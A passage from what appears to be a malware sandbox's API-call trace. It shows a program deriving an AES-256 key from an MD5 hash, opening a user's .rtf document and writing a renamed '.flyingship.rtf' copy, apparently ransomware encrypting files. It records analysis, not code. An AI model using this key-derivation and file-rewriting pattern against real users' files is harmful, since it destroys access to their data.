lpMsg=0x87eac4) returned 0 [0172.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.128] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.129] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.129] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.130] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.130] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.130] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.130] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.130] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.130] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.130] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.131] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.131] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.131] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.131] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.131] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.131] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.131] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0172.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.132] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.132] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.132] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.132] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.132] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.132] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.132] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.132] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.133] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0172.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.133] CryptDestroyHash (hHash=0x90af58) returned 1 [0172.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.134] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\hqhniizhaa.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.134] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.134] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0172.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0172.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0172.137] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0172.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.137] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0172.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0172.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\hqhniizhaa.flyingship.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0172.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.139] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0172.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0172.140] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0172.141] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0172.141] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0172.145] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x201f, lpOverlapped=0x0) returned 1 [0172.146] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) 